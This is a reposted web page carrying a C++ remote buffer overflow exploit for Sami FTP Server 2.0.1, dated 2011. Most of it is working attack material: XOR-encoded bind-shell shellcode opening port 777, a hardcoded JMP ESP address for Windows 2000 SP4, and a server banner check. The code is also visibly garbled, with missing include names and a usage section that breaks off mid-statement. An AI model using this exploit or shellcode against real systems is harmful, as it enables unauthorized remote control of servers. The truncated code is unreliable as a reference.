Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)

28-03-2011 00:08

 // Two includes.

#include 
#include 
// Project - Settings - Link > Object/Library modules \'Ws2_32.lib\'
#pragma comment(lib, \"ws2_32\")
 
char MyShellCode[] =       // XOR by \\x99\\x99\\x99\\x99.
\"\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x31\\xC9\\xB1\\x59\\x81\\x73\\x17\\x99\\x99\"
\"\\x99\\x99\\x83\\xEB\\xFC\\xE2\" // Bind ShellCode port 777.
                        \"\\xF4\\x71\\xA1\\x99\\x99\\x99\\xDA\\xD4\\xDD\\x99\"
\"\\x7E\\xE0\\x5F\\xE0\\x7C\\xD0\\x1F\\xD0\\x3D\\x34\\xB7\\x70\\x3D\\x83\\xE9\\x5E\"
\"\\x40\\x90\\x6C\\x34\\x52\\x74\\x65\\xA2\\x17\\xD7\\x97\\x75\\xE7\\x41\\x7B\\xEA\"
\"\\x34\\x40\\x9C\\x57\\xEB\\x67\\x2A\\x8F\\xCE\\xCA\\xAB\\xC6\\xAA\\xAB\\xB7\\xDD\"
\"\\xD5\\xD5\\x99\\x98\\xC2\\xCD\\x10\\x7C\\x10\\xC4\\x99\\xF3\\xA9\\xC0\\xFD\\x12\"
\"\\x98\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xC1\\x91\\x72\\x95\\x14\\xCE\\xB5\"
\"\\xC8\\xCB\\x66\\x49\\x10\\x5A\\xC0\\x72\\x89\\xF3\\x91\\xC7\\x98\\x77\\xF3\\x93\"
\"\\xC0\\x12\\xE4\\x99\\x19\\x60\\x9F\\xED\\x7D\\xC8\\xCA\\x66\\xAD\\x16\\x71\\x09\"
\"\\x99\\x99\\x99\\xC0\\x10\\x9D\\x17\\x7B\\x72\\xA8\\x66\\xFF\\x18\\x75\\x09\\x98\"
\"\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCC\\xB9\\xCE\\xCE\\xCE\\xCE\\xDE\\xCE\\xDE\"
\"\\xCE\\x66\\xCC\\x85\\x10\\x5A\\xA8\\x66\\xCE\\xCE\\xF1\\x9B\\x99\\x9A\\x90\\x10\"
\"\\x7F\\xF3\\x89\\xCF\\xCA\\x66\\xCC\\x81\\xCE\\xCA\\x66\\xCC\\x8D\\xCE\\xCF\\xCA\"
\"\\x66\\xCC\\x89\\x10\\x5B\\xFF\\x18\\x75\\xCD\\x99\\x14\\xA5\\xBD\\xA8\\x59\\xF3\"
\"\\x8C\\xC0\\x6A\\x32\\x10\\x4E\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA4\\x10\"
\"\\xE5\\xBD\\xD1\\x10\\xE5\\xBD\\xD5\\x10\\xE5\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\xCD\"
\"\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\xEC\\x99\\xC8\\x66\\xCC\\xA9\"
\"\\x10\\x78\\xF1\\x66\\x66\\x66\\x66\\x66\\xA8\\x66\\xCC\\xB5\\xCE\\x66\\xCC\\x95\"
\"\\x66\\xCC\\xB1\\xCA\\xCC\\xCF\\xCE\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\"
\"\\x9C\\xE1\\x98\\x73\\x12\\xD3\\x81\\x12\\xC3\\xB9\\x98\\x72\\x7A\\xAB\\xD0\\x12\"
\"\\xAD\\x12\\x98\\x77\\xA8\\x66\\x65\\xA8\\x59\\x35\\xA1\\x79\\xED\\x9E\\x58\\x56\"
\"\\x94\\x98\\x5E\\x72\\x6B\\xA2\\xE5\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x98\\x72\"
\"\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x98\\x72\\x12\\x9D\\x12\\x98\\x71\\x72\\x9B\"
\"\\xA8\\x59\\x10\\x73\\xC6\\xC7\\xC4\\xC2\\x5B\\x91\\x99\";
 
static char PayLoad[1329]; 
 
int IP;                    
int Port;                  
int szNOP1, szNOP2;        
int Nop;
 
// Jump ESP by library User32 on Win2000 SP4 fr..
char JmpESP[] = \"\\x0C\\xED\\xE3\\x77\";
// Flag ID server Sami FTP.
char TargetFlag[] = \"220-\\r\\n220 Features p a .\";
char RecvBuff[200];
 
void usage(){
  cout<<\" \"< 3 ) ){usage();return -1;}
 
if( argc > 1 ){
  cout<<\"argv[1]\"<<\"\\t\"<

Voltar

Procurar no site

© 2010 - 2013 Todos os direitos reservados. Designed by: Evandro Wirlynthon